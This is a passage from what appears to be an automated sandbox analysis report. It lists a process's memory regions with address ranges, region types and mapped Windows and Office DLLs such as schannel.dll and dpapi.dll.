Region: id = 1095 start_va = 0x11820000 end_va = 0x11958fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011820000" filename = "" Region: id = 1096 start_va = 0x11960000 end_va = 0x11960fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011960000" filename = "" Region: id = 1097 start_va = 0x11970000 end_va = 0x11971fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011970000" filename = "" Region: id = 1098 start_va = 0x11980000 end_va = 0x11985fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011980000" filename = "" Region: id = 1099 start_va = 0x11990000 end_va = 0x11991fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011990000" filename = "" Region: id = 1100 start_va = 0x119a0000 end_va = 0x119a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119a0000" filename = "" Region: id = 1101 start_va = 0x181d0000 end_va = 0x1919ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000181d0000" filename = "" Region: id = 1102 start_va = 0x11340000 end_va = 0x11341fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011340000" filename = "" Region: id = 1103 start_va = 0x11350000 end_va = 0x11352fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011350000" filename = "" Region: id = 1104 start_va = 0x11360000 end_va = 0x11361fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011360000" filename = "" Region: id = 1107 start_va = 0xb170000 end_va = 0xb170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b170000" filename = "" Region: id = 1108 start_va = 0xb180000 end_va = 0xb181fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b180000" filename = "" Region: id = 1109 start_va = 0xb190000 end_va = 0xb191fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b190000" filename = "" Region: id = 1110 start_va = 0xb1a0000 end_va = 0xb1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1a0000" filename = "" Region: id = 1111 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 1112 start_va = 0xb5d0000 end_va = 0xb5e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5d0000" filename = "" Region: id = 1113 start_va = 0xb170000 end_va = 0xb172fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b170000" filename = "" Region: id = 1114 start_va = 0xb180000 end_va = 0xb180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b180000" filename = "" Region: id = 1115 start_va = 0xb170000 end_va = 0xb171fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b170000" filename = "" Region: id = 1116 start_va = 0xb180000 end_va = 0xb181fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b180000" filename = "" Region: id = 1117 start_va = 0x11340000 end_va = 0x1143ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011340000" filename = "" Region: id = 1118 start_va = 0xb190000 end_va = 0xb19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b190000" filename = "" Region: id = 1119 start_va = 0xb1a0000 end_va = 0xb1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1a0000" filename = "" Region: id = 1120 start_va = 0xb1c0000 end_va = 0xb1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 1121 start_va = 0xb1c0000 end_va = 0xb1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 1122 start_va = 0xb5d0000 end_va = 0xb5d4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5d0000" filename = "" Region: id = 1123 start_va = 0x11440000 end_va = 0x114d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011440000" filename = "" Region: id = 1124 start_va = 0xb1c0000 end_va = 0xb1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 1125 start_va = 0xb5e0000 end_va = 0xb5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5e0000" filename = "" Region: id = 1126 start_va = 0xb5f0000 end_va = 0xb5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5f0000" filename = "" Region: id = 1127 start_va = 0xb5f0000 end_va = 0xb5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5f0000" filename = "" Region: id = 1128 start_va = 0xb600000 end_va = 0xb60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b600000" filename = "" Region: id = 1129 start_va = 0xb610000 end_va = 0xb61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b610000" filename = "" Region: id = 1130 start_va = 0xb600000 end_va = 0xb616fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b600000" filename = "" Region: id = 1131 start_va = 0xb620000 end_va = 0xb621fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b620000" filename = "" Region: id = 1132 start_va = 0xb630000 end_va = 0xb631fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b630000" filename = "" Region: id = 1133 start_va = 0xb640000 end_va = 0xb656fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b640000" filename = "" Region: id = 1134 start_va = 0xee20000 end_va = 0xee22fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee20000" filename = "" Region: id = 1135 start_va = 0xee70000 end_va = 0xee70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee70000" filename = "" Region: id = 1137 start_va = 0xb5d0000 end_va = 0xb5d4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5d0000" filename = "" Region: id = 1138 start_va = 0xb5f0000 end_va = 0xb606fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5f0000" filename = "" Region: id = 1139 start_va = 0xb610000 end_va = 0xb611fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b610000" filename = "" Region: id = 1140 start_va = 0xb620000 end_va = 0xb621fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b620000" filename = "" Region: id = 1141 start_va = 0xb630000 end_va = 0xb630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b630000" filename = "" Region: id = 1142 start_va = 0xb640000 end_va = 0xb656fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b640000" filename = "" Region: id = 1143 start_va = 0xee20000 end_va = 0xee22fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee20000" filename = "" Region: id = 1144 start_va = 0xee70000 end_va = 0xee70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee70000" filename = "" Region: id = 1145 start_va = 0x114e0000 end_va = 0x114e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114e0000" filename = "" Region: id = 1146 start_va = 0x114f0000 end_va = 0x114f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114f0000" filename = "" Region: id = 1147 start_va = 0x11500000 end_va = 0x11501fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011500000" filename = "" Region: id = 1148 start_va = 0x11510000 end_va = 0x11512fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011510000" filename = "" Region: id = 1149 start_va = 0x11520000 end_va = 0x11520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011520000" filename = "" Region: id = 1150 start_va = 0x11530000 end_va = 0x11532fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011530000" filename = "" Region: id = 1151 start_va = 0x11540000 end_va = 0x11540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011540000" filename = "" Region: id = 1158 start_va = 0xb5d0000 end_va = 0xb5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5d0000" filename = "" Region: id = 1159 start_va = 0xb5f0000 end_va = 0xb5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5f0000" filename = "" Region: id = 1160 start_va = 0xb600000 end_va = 0xb600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b600000" filename = "" Region: id = 1161 start_va = 0xb610000 end_va = 0xb610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b610000" filename = "" Region: id = 1162 start_va = 0xb620000 end_va = 0xb636fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b620000" filename = "" Region: id = 1163 start_va = 0xb640000 end_va = 0xb640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b640000" filename = "" Region: id = 1164 start_va = 0x114e0000 end_va = 0x114e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114e0000" filename = "" Region: id = 1165 start_va = 0xb5d0000 end_va = 0xb5d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5d0000" filename = "" Region: id = 1166 start_va = 0xb5f0000 end_va = 0xb5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5f0000" filename = "" Region: id = 1167 start_va = 0x114e0000 end_va = 0x11768fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114e0000" filename = "" Region: id = 1168 start_va = 0x11770000 end_va = 0x1186ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011770000" filename = "" Region: id = 1169 start_va = 0xb5d0000 end_va = 0xb5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5d0000" filename = "" Region: id = 1170 start_va = 0xb5f0000 end_va = 0xb5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5f0000" filename = "" Region: id = 1171 start_va = 0x7fe80000 end_va = 0x7fe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe80000" filename = "" Region: id = 1172 start_va = 0xb600000 end_va = 0xb60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b600000" filename = "" Region: id = 1173 start_va = 0xb610000 end_va = 0xb61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b610000" filename = "" Region: id = 1174 start_va = 0xb620000 end_va = 0xb62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b620000" filename = "" Region: id = 1175 start_va = 0x11870000 end_va = 0x11910fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011870000" filename = "" Region: id = 1176 start_va = 0xb630000 end_va = 0xb63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b630000" filename = "" Region: id = 1177 start_va = 0xb640000 end_va = 0xb64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b640000" filename = "" Region: id = 1178 start_va = 0xb650000 end_va = 0xb65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b650000" filename = "" Region: id = 1179 start_va = 0xee20000 end_va = 0xee2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee20000" filename = "" Region: id = 1180 start_va = 0xee70000 end_va = 0xee7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee70000" filename = "" Region: id = 1181 start_va = 0xee70000 end_va = 0xee7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee70000" filename = "" Region: id = 1182 start_va = 0x11920000 end_va = 0x1192ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011920000" filename = "" Region: id = 1183 start_va = 0x11930000 end_va = 0x1193ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011930000" filename = "" Region: id = 1184 start_va = 0x11940000 end_va = 0x1194ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011940000" filename = "" Region: id = 1185 start_va = 0x11950000 end_va = 0x1195ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011950000" filename = "" Region: id = 1186 start_va = 0x11980000 end_va = 0x1198ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011980000" filename = "" Region: id = 1187 start_va = 0x11990000 end_va = 0x1199ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011990000" filename = "" Region: id = 1188 start_va = 0x119a0000 end_va = 0x119affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119a0000" filename = "" Region: id = 1189 start_va = 0x119b0000 end_va = 0x119bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119b0000" filename = "" Region: id = 1191 start_va = 0x11980000 end_va = 0x11c68fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011980000" filename = "" Region: id = 1192 start_va = 0x13f80000 end_va = 0x14262fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013f80000" filename = "" Region: id = 1316 start_va = 0x65900000 end_va = 0x65a09fff monitored = 0 entry_point = 0x65961e10 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\SysWOW64\\webservices.dll" (normalized: "c:\\windows\\syswow64\\webservices.dll") Region: id = 1317 start_va = 0xee70000 end_va = 0xee74fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee70000" filename = "" Region: id = 1318 start_va = 0x114e0000 end_va = 0x114f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114e0000" filename = "" Region: id = 1319 start_va = 0x11500000 end_va = 0x11501fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011500000" filename = "" Region: id = 1320 start_va = 0x11510000 end_va = 0x11511fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011510000" filename = "" Region: id = 1321 start_va = 0x11520000 end_va = 0x11520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011520000" filename = "" Region: id = 1322 start_va = 0x11530000 end_va = 0x11546fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011530000" filename = "" Region: id = 1323 start_va = 0x11550000 end_va = 0x11552fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011550000" filename = "" Region: id = 1324 start_va = 0x11560000 end_va = 0x11560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011560000" filename = "" Region: id = 1325 start_va = 0x11570000 end_va = 0x11571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011570000" filename = "" Region: id = 1326 start_va = 0x11580000 end_va = 0x11581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011580000" filename = "" Region: id = 1327 start_va = 0x11590000 end_va = 0x11591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011590000" filename = "" Region: id = 1328 start_va = 0x115a0000 end_va = 0x115a2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115a0000" filename = "" Region: id = 1329 start_va = 0x115b0000 end_va = 0x115b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115b0000" filename = "" Region: id = 1330 start_va = 0x115c0000 end_va = 0x115c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115c0000" filename = "" Region: id = 1331 start_va = 0x115d0000 end_va = 0x115d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115d0000" filename = "" Region: id = 1332 start_va = 0x6f970000 end_va = 0x6f9d3fff monitored = 0 entry_point = 0x6f98afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1333 start_va = 0xee70000 end_va = 0xee72fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee70000" filename = "" Region: id = 1334 start_va = 0x6f960000 end_va = 0x6f96ffff monitored = 0 entry_point = 0x6f964600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 1335 start_va = 0x6f940000 end_va = 0x6f95ffff monitored = 0 entry_point = 0x6f94d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1336 start_va = 0x6f910000 end_va = 0x6f93bfff monitored = 0 entry_point = 0x6f92bb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 1337 start_va = 0x114e0000 end_va = 0x114e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114e0000" filename = "" Region: id = 1338 start_va = 0x114e0000 end_va = 0x1151ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114e0000" filename = "" Region: id = 1339 start_va = 0x11520000 end_va = 0x1161ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011520000" filename = "" Region: id = 1340 start_va = 0x6f8f0000 end_va = 0x6f909fff monitored = 0 entry_point = 0x6f8ffa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 1341 start_va = 0xee70000 end_va = 0xee79fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 1342 start_va = 0x11620000 end_va = 0x1162ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011620000" filename = "" Region: id = 1343 start_va = 0x11630000 end_va = 0x1163ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011630000" filename = "" Region: id = 1344 start_va = 0x11640000 end_va = 0x1164ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011640000" filename = "" Region: id = 1345 start_va = 0x11640000 end_va = 0x1164ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011640000" filename = "" Region: id = 1346 start_va = 0x11650000 end_va = 0x1165ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011650000" filename = "" Region: id = 1347 start_va = 0x11640000 end_va = 0x1164ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011640000" filename = "" Region: id = 1348 start_va = 0x11650000 end_va = 0x1165ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011650000" filename = "" Region: id = 1349 start_va = 0x7fe70000 end_va = 0x7fe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe70000" filename = "" Region: id = 1350 start_va = 0x11650000 end_va = 0x11652fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011650000" filename = "" Region: id = 1351 start_va = 0x11660000 end_va = 0x11660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011660000" filename = "" Region: id = 1352 start_va = 0x11690000 end_va = 0x116a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011690000" filename = "" Region: id = 1353 start_va = 0x116b0000 end_va = 0x116b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116b0000" filename = "" Region: id = 1354 start_va = 0x116c0000 end_va = 0x116c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116c0000" filename = "" Region: id = 1355 start_va = 0x116d0000 end_va = 0x116d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116d0000" filename = "" Region: id = 1356 start_va = 0x116e0000 end_va = 0x116e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116e0000" filename = "" Region: id = 1357 start_va = 0x116f0000 end_va = 0x116f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116f0000" filename = "" Region: id = 1358 start_va = 0x11700000 end_va = 0x11701fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011700000" filename = "" Region: id = 1359 start_va = 0x11710000 end_va = 0x11712fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011710000" filename = "" Region: id = 1360 start_va = 0x11720000 end_va = 0x11720fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011720000" filename = "" Region: id = 1361 start_va = 0x11730000 end_va = 0x11732fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011730000" filename = "" Region: id = 1362 start_va = 0x11740000 end_va = 0x11740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011740000" filename = "" Region: id = 1363 start_va = 0x11750000 end_va = 0x11766fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011750000" filename = "" Region: id = 1364 start_va = 0x11920000 end_va = 0x11922fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011920000" filename = "" Region: id = 1365 start_va = 0x11930000 end_va = 0x11930fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011930000" filename = "" Region: id = 1366 start_va = 0x11650000 end_va = 0x1165ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011650000" filename = "" Region: id = 1367 start_va = 0x11650000 end_va = 0x1165ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011650000" filename = "" Region: id = 1385 start_va = 0x6f8e0000 end_va = 0x6f8e7fff monitored = 0 entry_point = 0x6f8e1d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 2051 start_va = 0x11650000 end_va = 0x11652fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011650000" filename = "" Region: id = 2052 start_va = 0x11660000 end_va = 0x11660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011660000" filename = "" Region: id = 2852 start_va = 0x11650000 end_va = 0x11651fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011650000" filename = "" Region: id = 2853 start_va = 0x11f80000 end_va = 0x11f80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f80000" filename = "" Region: id = 2854 start_va = 0x12c40000 end_va = 0x12c40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c40000" filename = "" Region: id = 2860 start_va = 0x11650000 end_va = 0x1165bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011650000" filename = "" Region: id = 2861 start_va = 0x11660000 end_va = 0x1166bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011660000" filename = "" Region: id = 2965 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2966 start_va = 0x580000 end_va = 0x5a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alrtintl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\alrtintl.dll") Region: id = 2967 start_va = 0x580000 end_va = 0x5bbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2968 start_va = 0x4c0000 end_va = 0x4e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2982 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2983 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 2984 start_va = 0x191a0000 end_va = 0x1bdbdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 2985 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 2986 start_va = 0x580000 end_va = 0x598fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2987 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 2988 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 2989 start_va = 0x5a0000 end_va = 0x5a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 2990 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2991 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2992 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 2994 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2995 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2996 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 2997 start_va = 0x580000 end_va = 0x598fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2998 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2999 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3000 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 3001 start_va = 0x580000 end_va = 0x598fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3002 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3003 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3004 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 3010 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3011 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 3012 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3013 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 3014 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3015 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3016 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 3017 start_va = 0x580000 end_va = 0x598fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3018 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3019 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 3020 start_va = 0x580000 end_va = 0x598fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3021 start_va = 0x580000 end_va = 0x582fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3022 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3023 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3024 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3025 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 3026 start_va = 0x580000 end_va = 0x598fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3027 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3028 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 